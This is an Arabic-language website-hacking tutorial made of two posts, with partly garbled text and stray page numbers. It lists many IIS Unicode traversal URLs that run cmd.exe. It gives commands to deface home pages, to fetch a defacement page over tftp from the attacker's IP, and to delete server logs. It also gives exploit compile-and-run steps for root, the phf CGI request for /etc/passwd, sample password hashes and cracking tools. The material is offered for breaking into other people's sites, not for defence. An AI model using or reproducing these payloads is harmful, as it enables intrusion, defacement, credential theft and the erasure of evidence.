وشك قرائته من اخطر المواضیع التي‪ ‬‬ ‫كتبھا في حیاتي و ھ ي ايضا في رايي من اقوى المواضیع التي كتبت على‪ ‬‬ ‫الطلق‪ ‬‬ ‫لیس لقدرة في ( حاشاالله ) انما بسبب شمولیة الموضوع و تعدد الفكار فیه‪ ‬‬ ‫بعد قرائة ھ ذا الموضوع ستتكون عندك فكره قويه جدا حول اختراق المواقع ‪ ...‬‬ ‫لیس بالضروره ان تخترق مواقع بعد قرائة ھذا الموضوع انما ستفھم ما يحدث‪ ‬‬ ‫من حولك‪ ‬‬ ‫و تفھم ايضا معظم اسالیب الختراق‪ ‬‬ ‫اول ‪ :‬معرفة نظام الموقع ‪ :‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫لبد من معرفة نظام الموقع حتى تحدد مسارك في خطوات الختراق ‪ ..‬لذا‪ ‬‬ ‫فلبد من معرفة النظام و يمكن ھ ذا عن طريق اشكال كثییره اذكر منھا‪ ‬‬ ‫اھم و ابسط طرق ‪ :‬‬ ‫ عن طريق موقع ‪ netcraft‬الشھییر‪ ‬‬‫ بعض البرامج المخصصه لذلك‪ ‬‬‫ عن طريق محاولة التصال بالموقع من التلنت ‪ telnet‬‬‫ و ممكن ايضا عن طريق عمل سكان على الموقع ‪ port scan‬و بعض البورتات‪ ‬‬‫المفتوحه تدل على انظمه معینه‪ ‬‬ ‫اسھل ھذه الطرق ھي الولى في رايي ‪ :‬‬ ‫وصلة الموقع ‪ http://www.netcraft.com/whats :‬تضع اسم الموقع المراد‪ ‬‬ ‫فحصه ثم ‪ enter‬لتحصل على النتیجه‪ ‬‬ ‫امثله ‪ :‬‬ ‫‪running IISx on The Site www.xxx.com is running Apache on Linux or‬‬ ‫‪ NT/windows9x/2000/Xp‬‬ ‫‪ 703‬‬ ‫و من ھنا نلحظ انه ھناك نتیجتین ( على القل )‪ ‬‬ ‫في المثال الول ‪ :‬‬ ‫‪ ) Apache = Web Server‬الملقم باللغة العربیه )‪ ‬‬ ‫‪ ) Linux = Server's Os‬نظام الشتغیل )‪ ‬‬


‫في المثال الثاني ‪ :‬‬ ‫‪ Server IIS = Web‬‬ ‫‪ Windows/NT/2000/xp = Server's Os‬‬ ‫ھناك انظمه اخرى كثییره و ملقمات اخرى ايضا ‪ :‬‬ ‫انظمه اخرى مثل ‪ NetBSD , , SunOS , FreeBSD (My BaBe) , OpenBSD :‬‬ ‫‪ AIX , IRIX‬‬ ‫ملقمات اخرى مثل ‪ NetScape Enterprise :‬‬ ‫كما يمكن ايضا من موقع ‪ Netcraft.com‬معرفة بعض الخدمات على السیرفر‪ ‬‬ ‫مثل نسخة ال ‪ PHP‬و ‪ FrontPage‬الخ ‪ ....‬‬ ‫و الن و بعد ان توصلنا الي نتائج معینه نريد ان نباشر العمل ‪ ...‬‬ ‫و ساوضح میفیة التفكیر و خطوات الختراق في حالتي الويندوز و اللینكس باذن‬ ‫االله‪ ‬‬ ‫ماذا لو اكتشفت ان الموقع يعمل على نظام ويندوز ‪NT/9x/2000/xp Windows‬‬ ‫؟‪ ‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‬ ‫­­­­­­­­­­­‪ ‬‬ ‫اذا لبد من التفكییر في الختراق من عدة امور ‪ :‬‬ ‫‪ IIS Unicodes .1‬و ھ ي كثیییره جدا و متنوعه على جمیع اصدارات ال ‪ IIS‬‬ ‫‪ FTP Server .2‬و ھي ثغرات ال ‪ FTP‬‬ ‫‪ Sharing Files.3‬المشاركه بالملفات‪ ‬‬ ‫‪ 4.FrontPage‬‬ ‫نبدا من السھل تحققا فالصعب ‪ :‬‬ ‫‪ ... FTP‬بما ان معظم قرائ ھ ذا الموضوع من مستخدمین الويندوز فمعظم‪ ‬‬ ‫كلمي سیكون حول الويندوز في تنفیذ العملیات‪ ‬‬ ‫اذھب الى ‪ ftp ­n hostname <run<start‬‬ ‫‪ 803‬‬ ‫و من ثم ستفتح الدوس و تعمل كونكت ‪ Connection‬مع السیرفر و يقولك عن‪ ‬‬ ‫نسخة ال ‪ FTP server‬الموجوده على السیرفر‪ ‬‬ ‫بنمتھى البساطه ممكن التاكد من ھذه النسخه فیھ ا ثغرات دون استخدام اي‬ ‫برامج من محركات البحث الشھیره مثل ‪ :‬‬ ‫‪ packetstrom , securityfocus , google.com‬الخ ‪ ..‬‬ ‫‪ : Sharing Folders‬‬ ‫عن طريق ال ‪ Port 139 <== NetBios‬و ھ ذا يمكن الكشف عنه عن طريق‪ ‬‬ ‫‪ Scanner Port‬على البورت رقم ‪ 931‬اي برنامج سیوفي الغرض مثل‪ ‬‬ ‫‪ SuperScan‬الخ‪ ‬‬ ‫و بعدھ ا تحاول تعمل كونكت مع السیرفر عن طريق ‪ ip address\\<run<start‬‬ ‫ممكنا تكون فیه كلمة سر و ممكن ل ( خلیھا على االله )‪ ‬‬ ‫الفرونت بیج ‪ FrontPage‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫ھناك ثغرات كثییره يمكن استغللھا منه اذكر منھا اشھر الثغرات ‪ :‬‬ ‫‪ http://www.xxx.com/_vti_pvt/service.pw‬‬ ‫و منھ ا نحصل على كلمة المرور و كلمة السر‪ ‬‬ ‫كلمة السر مشفره بمقیاس ‪ DES‬و الذي يمكن كسره ببرامج كثییره اشھرھا‪ ‬‬ ‫‪ John The Ripper‬و الذي يعمل في بیئتي الويندوز و ال *‪ nix‬‬ ‫اخییرا و لیس اخرا ‪ IIS‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫‪ Inetnet Information Service = IIS‬‬ ‫و نستخدم ثغراته المعروفه بالیونیكودز ‪ Unicodes‬‬ ‫و ھ ي كثیییییییییییییییییره جدا و انا اعني ما اقول ‪ ):‬‬ ‫مثل ‪ :‬‬


**** http://www.xxxx.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c \:+dir+c http://www.xxxx.com/scripts/..%c0%9v../winnt/system32/cmd.exe?/c \:+dir+c http://www.xxxx.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c \:+dir+c 903 http://www.xxxx.com/scripts/..%c0%qf../winnt/system32/cmd.exe?/c \:+dir+c http://www.xxxx.com/scripts/..%c1%8s../winnt/system32/cmd.exe?/c \:+dir+c http://www.xxxx.com/scripts/..%c1%9c../winnt/system32/cmd.exe?/c \:+dir+c http://www.xxxx.com/scripts/..%c1%pc../winnt/system32/cmd.exe?/c \:c+ +dir / msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/syst \:em32/cmd.exe?/c+dir+c / MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+ \:dir+c / MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe \:?/c+dir+c / MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/syst \:em32/cmd.exe?/c+dir+c / MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63 \:winnt/system32/cmd.exe?/c+dir+c _/ vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cm \:d.exe?/c+dir+c _/ vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system3 \:2/cmd.exe?/c+dir+c _/ vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%6 \:3../winnt/system32/cmd.exe?/c+dir+c _/ vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63.. 310 \:%25%35%63../winnt/system32/cmd.exe?/c+dir+c PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c/ \: / PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir \:+c /


PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd. \:exe?/c+dir+c / PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system3 \:2/cmd.exe?/c+dir+c \:Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c/ \:Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c/ / Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/ \:c+dir+c / Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cm \:d.exe?/c+dir+c _/ vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cm \:d.exe?/c+dir+c _/ vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system3 \:2/cmd.exe?/c+dir+c _/ vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%6 \:3../winnt/system32/cmd.exe?/c+dir+c _/ vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63.. \:%25%35%63../winnt/system32/cmd.exe?/c+dir+c / samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/syste 311 \:m32/cmd.exe?/c+dir+c cgi­/ bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/ \:cmd.exe?/c+dir+c / iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/syste \:m32/cmd.exe?/c+dir+c _/ vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system \:32/cmd.exe?/c+dir+c / adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/sys \:tem32/cmd.exe?/c+dir+c / scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cm \:d.exe?/c+dir+c / scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cm \:d.exe?/c+dir+c / scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cm \:d.exe?/c+dir+c


/ scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+di \:r+c \:scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c/ \:scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c/ \:scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c/ \:scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c/ \:scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c/ \:scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c/ \:scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c/ \:scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c/ / 312 msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/ \:c+dir+c _/ vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/ \:c+dir+c ‫ منھا‬%0.1 ‫و ثغرات اخى كثییییییییییییییییییییییره جدا ما كتبه ل يساوي‬ ‫و سابدا حال طريقه استغلل ھذه الثغرات بكذى طريقه‬ cmd.exe ‫ يتم تطبیق ھ ذه الثغرات مباشرة من المتصفح مستغلین ملف ال‬ ‫اتنفیذ اوامرنا‬ : ‫مثال للثغره و تطبیق الوامر‬ http://www.xxxx.com/_vti_bin \:c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c%../ : ‫امر انشاء دلیل جديد‬ ­­­­­­­­­­­­­­­­­­­­­­­­­ http://www.xxxx.com/_vti_bin c0%af../..%c0%af../winnt/system32/cmd.exe?/c+md+c:\DJ%../ :‫امر الغاء دلیل‬ ­­­­­­­­­­­­­­­­ http://www.xxxx.com/_vti_bin c0%af../..%c0%af../winnt/system32/cmd.exe?/c+rd+c:\DJ%../ :‫المر المستخدم للنسخ‬ ­­­­­­­­­­­­­­­­­­­­­­­­­­­­­ http://www.xxxx.com/_vti_bin %../ c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:\winnt\syste m32\cmd.exe+c:\inetpub\scripts\DJ.exe 313 ‫المر المستخدم للحذف‬ ­­­­­­­­­­­­­­­­­­­­­­­­­­­­­ http://www.xxxx.com/_vti_bin %../ c0%af../..%c0%af../winnt/system32/cmd.exe?/c+md+c:\inetpub\ww wroot\index.asp : ‫المر المستخدم لتغییر مسمى الملف‬ ­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­ http://www.xxxx.com/_vti_bin %../


‫‪c0%af../..%c0%af../winnt/system32/cmd.exe?/c+ren+c:\DJ.htm+DJK‬‬ ‫‪ ING.htm‬‬ ‫لمر المستخدم لرؤية محتويات الملف‪ ‬‬ ‫___________________________‪ ‬‬ ‫‪ http://www.xxxx.com/_vti_bin‬‬ ‫‪ %../‬‬ ‫‪ c0%af../..%c0%af../winnt/system32/cmd.exe?/c+type+c:\index.htm‬‬ ‫المر المستخدم للكتابة داخل أي ملف‪ :‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫‪ http://www.xxxx.com/_vti_bin‬‬ ‫‪ %../‬‬ ‫‪c0%af../..%c0%af../winnt/system32/cmd.exe?/c+echo+HACKED+BY+‬‬ ‫‪ c:\DJ.txt+<+DJ+KING‬‬ ‫ملحوظه‪ : ‬‬ ‫­­­­­­­­­­­­‪ ‬‬ ‫قد نحتاج الى تغییر مسمى الدلیل بحیث يكون‪ vti_bin , _ , msadc : ‬‬ ‫‪ iisadmpwd , _vit_admin , scripts , samples , cgi­bin‬‬ ‫‪ 314‬‬ ‫و الن لتغییر الصفحه الولى للومقع لبد من ‪ :‬‬ ‫ الكتابه على الصفحه الرئیسیه مستخدمین المر ‪ echo‬‬‫ برفع صفحتك الشخصیه بواسطة برنامج ال ‪ TFTP‬‬‫طريقة الكتابه على الملف الرئیسي للموقع ‪ index.htm‬باستخدام المر ‪ echo‬‬ ‫‪ :‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‬ ‫­­­­­­­­­‪ ‬‬ ‫مبدئیا لبد من نسخ ملف ‪ cmd.exe‬الي مجلد ‪ scripts‬بھذا الشكل على‪ ‬‬ ‫سبیل المثال ‪ :‬‬ ‫‪ http://www.xxxx.com/_vti_bin‬‬ ‫‪ /..%‬‬ ‫‪c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:\winnt\syste‬‬ ‫‪ m32\cmd.exe+c:\inetpub\scripts\DJ.exe‬‬ ‫و بعد ان تم نسخ الملف يمكن تصفح الموقع بالثغره الجديده ‪ :‬‬ ‫‪ \:http://www.xxx.com/scripts/DJ.exe/c+dir+c‬‬ ‫و بعدھ ا يمكن تنفیذ المر ‪ echo‬بالشكل التالي ‪ :‬‬ ‫‪http://www.xxx.com/scripts/CMD1.exe?/c+echo+HACKED+BY+EL+BA‬‬ ‫‪ +<+TAR++abcd_110@hotmail.com+_+Long+Live+Palestine‬‬ ‫‪ E:\Lymphasite\2.htm‬‬ ‫* ملحوظات ھامه‪ :‬‬ ‫­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫ لیس بالضروره ان يكون الندكس الرئسیه للموقع اسمھا ‪ index.htm‬فممكن‪ ‬‬‫ان تكون ‪ :‬‬ ‫‪ default.htm , default.asp , index.html , default.html‬فعلیك التاكد اول من‪ ‬‬ ‫اسم الملف و لكن ‪ index.htm‬ھو الفتراضي ان يكون الرئیسي‪ ‬‬ ‫ ممكن ان يكون الملف الرئیسي في مجلد غیر ال ‪ wwwroot‬لذا فلبد من‪ ‬‬‫البحث ‪ ...‬‬ ‫‪ 513‬‬ ‫طريقة استخدام رفع الصفحه بواسطة برنامج ‪ : TFTP‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫سیتم تبطیقھا ايضا بالثغره التي اقترضتھا اعلى‪ ‬‬ ‫‪ -‬حمل برنامج ال ‪ tftp‬فھو صغیر و مجاني‪ ‬‬


‫ ضعه في ال ‪ \:c‬‬‫ ضع الندكس او صفحتك المراد رفعھا في ايضا ال ‪ \:c‬‬‫ شغل البرنامج و اجعله جاھزا ثم نفذ المر التالي ‪ :‬‬‫‪ http://www.xxxx.com/_vti_bin‬‬ ‫‪ /..%­"+c0%af../..%c0%af../winnt/system32/cmd.exe?/c+tftp.exe‬‬ ‫‪ i"+y.y.y.y+GET+index.htm+C:\inetpub\wwwroot\index.htm‬‬ ‫حیث ‪ :‬‬ ‫­­­­­­­‪ ‬‬ ‫‪ tftp.exe‬ھو البرنامج المستخدم للرفع‪ ‬‬ ‫"‪ "­i‬برامیتر‪ ‬‬ ‫‪ y.y.y.y‬رقم اليبي الخاص بك‪ ‬‬ ‫و الباقي على ما اظن ل يحتاج توضیح ‪ C:\inetpub\wwwroot\index.htm ..‬ھو‬ ‫الوضع الفتراضي كما ذكرت لكن ممكن ان يختلف من موقع لخر فلبد من‪ ‬‬ ‫التاكد اول‪ ‬‬ ‫و اخیرا لمسح اللوق ‪ :‬‬ ‫‪ http://www.xxxx.com/_vti_bin‬‬ ‫‪ /..%‬‬ ‫‪c0%af../..%c0%af../winnt/system32/cmd.exe?/c+del+c:/winnt/system‬‬ ‫‪ 32/logfiles/*.log‬‬ ‫ھذا تقريبا كل ما يخص سیرفرات الويندوز و ال ‪ IIS‬‬ ‫اما بالنسبه للمواقع التي سیرفراتھا على سبیل المثال ‪ Apache on linux :‬‬ ‫فطريقة التفكییر ستتغیر كلیا ماعدا الختراق عن طريق ال ‪ ftp server‬‬ ‫‪ 613‬‬ ‫فمعظم نسخ ال ‪ ftp‬لھا ثغرات يمكن استغللھا‪ ‬‬ ‫ملحوظه ‪ :‬‬ ‫­­­­­­­­­­­‪ ‬‬ ‫عند اختراق مثل ھ ذه المواقع لبد من استخدام *‪ nix‬اذا كان على جھازك او‪ ‬‬ ‫من ‪ Unix Shell‬و انت متصل من الويندوز ھ ذا حسب ايمكانیاتك المتاحه‪ ‬‬ ‫بالنسبه للیونكس شیل لتحاول ابدا استخدام شیلت مجانیه فلن تفلح و‪ ‬‬ ‫سیتم الغاء اشتراكك‪ ‬‬ ‫بعد ما توصلت لموقع معین ووجدث ثغره معینه طريقة تطبیقھا يكون بالطريقه‪ ‬‬ ‫ھذه ( في حالة ان ‪ exploite‬ھي ‪ ( source code‬‬ ‫الملف سیكون ‪ exploit.c‬فتطبیقھا عادة ما يكون بھذا الشكل ‪ :‬‬ ‫‪ gcc ­o exploit exploite.c‬‬ ‫و من ثم ‪ ./exploit victim‬حیث ال ‪ victim‬رقم اليبي او الھوست نیم مثل ‪ :‬‬ ‫‪ www.xxx.com‬‬ ‫و بدھا يمكن الحصول على ‪ root‬‬ ‫نفذ المر ‪ pwd‬للتاكد من مكانك على السیرفر و من ثم قم بعمل المر ‪cd / to‬‬ ‫‪ make sure u go to the root place‬‬ ‫للذين يحبون توخذ الحذر قبل تغییر الصفحه الرئیسیه ‪ ..‬قومو باستخدام المر‪ ‬‬ ‫‪ who‬لمعرفة من معك حالیا على السیرفر‪ ‬‬ ‫اذا كنت لوحدك باشر عملك علطول و ابحث عن ال ‪ index.html‬يمكن ذلك عن‪ ‬‬ ‫طريق المر ‪ :‬‬ ‫‪ find / ­name index.html‬‬ ‫ھذا سیقوم بالبحث في كل السیرفر عن اسم ھذا الملف و بعد الحصول على‪ ‬‬ ‫الملف المراد و غالبا ما يكون في ادى ھذه المجلدات ‪htdocs, httpd, htroot , :‬‬ ‫‪ webdocs, and www‬‬ ‫اما ان تحمل الندكس الخاصه بك من اي مكان عن طريق ‪ ftp‬او تستخدم‪ ‬‬ ‫طريقتي المفضله و ھي ‪ :‬‬ ‫‪ index.html cat or pico‬حیث ان ال ‪ cat or pico‬ھما ‪ text editors‬و من ثم قم‬


‫بمسح كود ال ‪ html‬بتاع الصفحه و الصق كود ال ‪ html‬بتاع صفحتك انت و‪ ‬‬ ‫اعمل ‪ save‬اخرج‪ ‬‬ ‫و بالشفا كده الطبخه استوت ‪ lol‬‬ ‫او انك تستخد المر ‪ echo‬و ھو في منتھى السھول بھذا الشكل ‪ echo :‬‬ ‫‪ file< ""whatever‬مثال ‪ index.html< "echo "HACKED BY DJ KING :‬‬ ‫‪ 713‬‬ ‫و انتھى الموضوع ‪ ):‬‬ ‫لمسح اللوق دور على كل فیلت اللوق باستخدام ھذه الوامر ‪ :‬‬ ‫‪ find / ­name log‬‬ ‫‪ find / ­name logs‬‬ ‫‪ find / ­name logfiles‬‬ ‫‪ name klogd­ / find‬‬ ‫‪ find / ­name syslogd‬‬ ‫و من ثم امسحھم بالمر ‪ folder/log/ rm ­rf‬‬ ‫عملیة الختراق لیست صعبه كما يظن البعض انما تحتاج لسلوب صحیح في‪ ‬‬ ‫التفكیر ‪ ..‬و تحتاج لمتابعة احدث الثغرات و كیفیة الحصول علیھا‪ ‬‬ ‫مواقع بھا ارشیف ثغرات ‪ :‬‬ ‫‪ hack.co.za‬‬ ‫‪ packetstorm.securify.com‬‬ ‫‪ securityfocus.com‬‬ ‫و مواقع اخرى كثییره لكن ھذه اشھرھ م ‪ ...‬ارجو ان اكون وفقت في ھذا الشرح‬ ‫العلى نسبیا من المبسط ‪ ..‬‬ ‫‪ 813‬‬ ‫اختراق المواقع‪ ‬‬ ‫للكاتب‪ kondor:‬‬ ‫إختراق المواقع ماھ و ال شئ بسیط ‪ ،‬نعم بسیط ولكن في حاله واحده وھي‪ ‬‬ ‫أن تتعرف على نظام التشغیل لسیرفر وھي مسأله في غايه البساطه والمر‪ ‬‬ ‫الثاني ان تكون عالما بالثغرات الموجوده فیه ‪ ،‬وتكون المسأله صعبه إذا كنت‪ ‬‬ ‫تريد تريد إختراق مواقع كبیره ومشھوره ولھا ھ یبه وحمايه عالیه حیث أنك في‪ ‬‬ ‫ھ ذه الحاله سوف تنسى الثغرات الموجوده عندك عن النظام الخادم لھذا‪ ‬‬ ‫الموقع لن وبالتأكید قد رقعت وعلیك أن تفكر في إكتشاف ثغره في ھذا الموقع‬ ‫لتخترقه وھذه الناحیه لن أتحدث عنھا لني ل أعرفھا ‪ ،‬ولكن سوف نتحدث عن‬ ‫البیسك سیرفر ھ و السیرفر الخادم لكثر المواقع العربیه وھو سیرفر بسیط في‬ ‫الحمايه ‪ ,,,‬‬ ‫لختراق ھ ذا النوع من السیرفرات علیك التعرف على نظام التشغیل له ويتم‪ ‬‬ ‫ذلك من عده طريق لتعرف علیه‪ ‬‬ ‫مثل نريد اختراق الموقع‪ ‬‬ ‫‪ www.kondor.com‬‬ ‫وھذا موقع لیس مجاني بل ھ و نطاق له سیرفره ورقم آي بي ثابت وھذا شئ‪ ‬‬ ‫معلوم لدى الجمیع‪ ‬‬ ‫نرسل رساله الى عنوان بريدي خاطئ الى ھذا السیرفر وسوف يرد علیك بأن‪ ‬‬ ‫ھ ذا البريد غیر موجود في الموقع والبريد مثل ھو‪ ‬‬ ‫‪ hgguutujfkerh@kondor.com‬‬ ‫وھ و بالفعل غیر موجود في الموقع عنوان بريد بالسم ھذا ‪ ،‬من خلل الرساله‪ ‬‬ ‫التي وصلتك تخبركبأن عنوان البريد ھ ذا غیر موجود تستطیع التعرف من خللھا‪ ‬‬ ‫على نظام الموقع ‪ ،‬وھذه واحده من الطرق‪ ‬‬ ‫ثانیا علیك الن وبعد معرفه نظام التشغیل لھذا الموقع أن تبحث عن الثغرات له‬ ‫‪ ////////////‬‬ ‫‪ ////////////‬‬ ‫ملحظه مھمه‪ ‬‬


‫‪ ////////////‬‬ ‫‪ ////////////‬‬ ‫قد يخترق أحد المواقع ويكون السبب لیس نظام التشغیل ‪ ،‬بل يكون أحد‪ ‬‬ ‫البرامج المثبته علیه مثل ملفات سي حي آي وقد تستخدم لجلب ملف‪ ‬‬ ‫الباسورد المسمى دائما بـ ‪ passwd‬وھناك حادثه مثل ھذه في إصدارات‪ ‬‬ ‫‪ WWWThreads‬للمنتديات‪ ‬‬ ‫‪ 913‬‬ ‫‪ /////////////////////////////////////////////////‬‬ ‫لنفرض انك تبي تخترق سیرفر بسیط وقلیل المن وھذا النوع منتشر بكثره‪ ‬‬ ‫بكثره نعم بكثره ‪ ،‬عندھا سوف يكون إختراق ھذا النوع والحصول على الباسورد‬ ‫فايل امر في غايه البساطه نعم في غايه البساطه ولداعي بعد ان تخترق بأن‬ ‫تقول لمن يطلب منك جواب لسؤال ‪ ..‬كیف ؟ ان ترد علیه بأن العملیه معقده‪ ‬‬ ‫وھذا الرد كاذب‪ ‬‬ ‫مثل أدخل على السیرفر في وضع التخفي‪ ‬‬ ‫‪ )) anonymously‬إستخدم التلنت في ھذه الخطوه ))‪ ‬‬ ‫وانظر الى المجلد المسمى بـ‪ ‬‬ ‫‪ etc‬‬ ‫وأطلب الملف‪ ‬‬ ‫‪ passwd‬‬ ‫ھل رأيت ‪ ...‬ھ ي عملیه بسیطه ولكن قف ! الملف يحتوي على كلم السر‪ ‬‬ ‫الخاصه بالموقع وغسماء المستخدمین للسیرفر وكلماتھم السريه ولكن‪ ‬‬ ‫كلماتھم السريه تكون مشفره‪ ‬‬ ‫طريقه أخرى لختراق ھذا النوع من السیرفرات‪ ‬‬ ‫أبحث في الموقع المستھ دف من خلل المتصفح عن يا ترى وجود سي جي‪ ‬‬ ‫آي‪ ‬‬ ‫عند توفره أطلب الملف التالي‪ ‬‬ ‫‪ cgi­bin/phf?Qalias=x‬‬ ‫‪ /bin/cat /etc/passwd‬‬ ‫مثل عنوان الموقع ھو‪ ‬‬ ‫‪ www.kondor.com‬‬ ‫نكتب ھكذا‪ ‬‬ ‫‪ www.kondor.com/cgi­bin/phf?Qalias=x‬‬ ‫‪ /bin/cat /etc/passwd‬‬ ‫عندھا سوف يرسل لك الملف‪ ‬‬ ‫‪ passwd‬‬ ‫وسوف يكون في الملف إسماء وكلمات السر المرخص لھم دخول السیرفر‪ ‬‬ ‫ولكن قف ھ ناك أمر حیرني كثیرا وجاب لي الصداع وحیث اني ذھبت لتصمیم‪ ‬‬ ‫برامج لفك التشفیر عن كلمات السر فھي مشفره وأنتھى المر بي البرنامج‪ ‬‬ ‫الذي صمم على يد أحدھم !‪ ‬‬ ‫‪ 023‬‬ ‫الن سوف أضع أسئله وأجوبه لتسھل الفھم‪ ‬‬ ‫س‪ :‬ما الملف‪ ‬‬ ‫‪ passwd‬‬ ‫وھل الحصول علیھ ا يعتبر من الشیاء المسموح عرضھا ؟‪ ‬‬ ‫ج‪ :‬الملف‪ ‬‬ ‫‪ passwd‬‬ ‫يحتوي كلمات السر وأسماء المستخدمین المسموح لھم دخول جھاز السیرفر‬ ‫وھ و غیر مسموح بعرضه ولكن ھناك ثغرات وطرق ذكرنا بعضھا أو القلیل منا‪ ‬‬ ‫وسوف نذكر أكثر ‪ ،‬المھم عند حصولك على الملف سوف تشاھد مكتوب فیه‪ ‬‬ ‫ھكذا مثل‪ ‬‬


‫شفرة‬ ­ Sources Code root:x:0:1:0000­Admin(0000):/:/bin/ksh 0000(:/:(daemon:x:1:1:0000­Admin :bin:x:2:2:0000­Admin(0000):/usr/bin listen:x:37:4:Network Admin:/usr/net/nls:nobody:x:60001:60001:uid :/:nobody:/:noaccess:x:60002:60002:uid noaccess 4:101::ftp:x :FTPUser:/export/home/ftp kondor:yu&rte6745kd:4:RichardClark:/export/home/kondor ‫إحنا علینا من السطر ھذا‬ kondor:yu&rte6745kd:4:RichardClark:/export/home/kondor ‫ولتفسیره نقول بأن‬ ‫إسم المستخدم ھو‬ kondor ‫ حط خطین تحت كلمه مشفره ھي‬.. ‫وكلمه السر المشفره‬ yu&rte6745kd ‫وايضا‬ 102 :User number 4 :Group Number Real Name (usually): Richard Clark Home Directory: /export/home/rrc Type of Shell: /bin/ksh passwd ‫الن فھمنا ماذ يعني السطر ھذا السطر من الملف‬ 123 kondor:yu&rte6745kd:4:RichardClark:/export/home/kondor ‫حاولت أن تعرف من ھذه شئ‬ admin sign in:/:/bin/csh 0:0::sysadm:ufcNtKNYj7m9I Regular Admin login:/admin:/sbin/sh :bin:*:2:2:Admin :/bin :sys:*:3:3:Admin :/usr/src adm:*:4:4:Admin :/usr/adm:/sbin/sh daemon:*:1:1: Daemon Login for daemons needing 43556:43556:*::/::nobody :ftp:*:39:39:FTP guest login:/var/ftp dtodd:yYn1sav8tKzOI:101:100:John Todd:/home/dtodd:/sbin/sh joetest:0IeSH6HfEEIs2:102:100::/home/joetest:/usr/bin/restsh ‫ ھل اي ثغره تنجح ؟‬: ‫س‬ ‫ لبد ان تكون عارفا لي شئ ھذه الثغره ولي نظام تشغیل وھل‬، ‫ ل طبعا‬: ‫ج‬ ‫يلزم أن يكون مع نظام التشغیل برنامج آخر لیتم الدخول على السیرفر أو على‬ ‫ وكل ھذه المعلومات لبد من توفرھا‬، ‫الروت‬ ‫ يعمل على نظام لینكس‬alsahat.net ‫مثل الموقع‬ ‫وقد يكون لثغره أن سبق ورقعت‬ ‫ ھ ل يختلف تشفیر كلمه السر من نظام لخر ؟‬: ‫س‬ ... ‫ ھذا شئ أكید‬: ‫ج‬ ‫ ھل ھ ناك برامج مخصصه لكلمات السر لكل نظام ؟‬: ‫س‬ (passwd( ‫ مثل برنامجي المفضل لكسر شفرات الكلمات السريه‬، ‫ نعم‬: ‫ج‬ ‫ ولكن للسف أنا ل أملكه الن وھناك برنامج آخر قد‬Brute ‫لنظام يونكس ھو‬ Cracker Jack 4.1 ‫يكون أفضل من سابقه وھو‬ ‫إعذروني لن كان كلمي مو مرتب‬


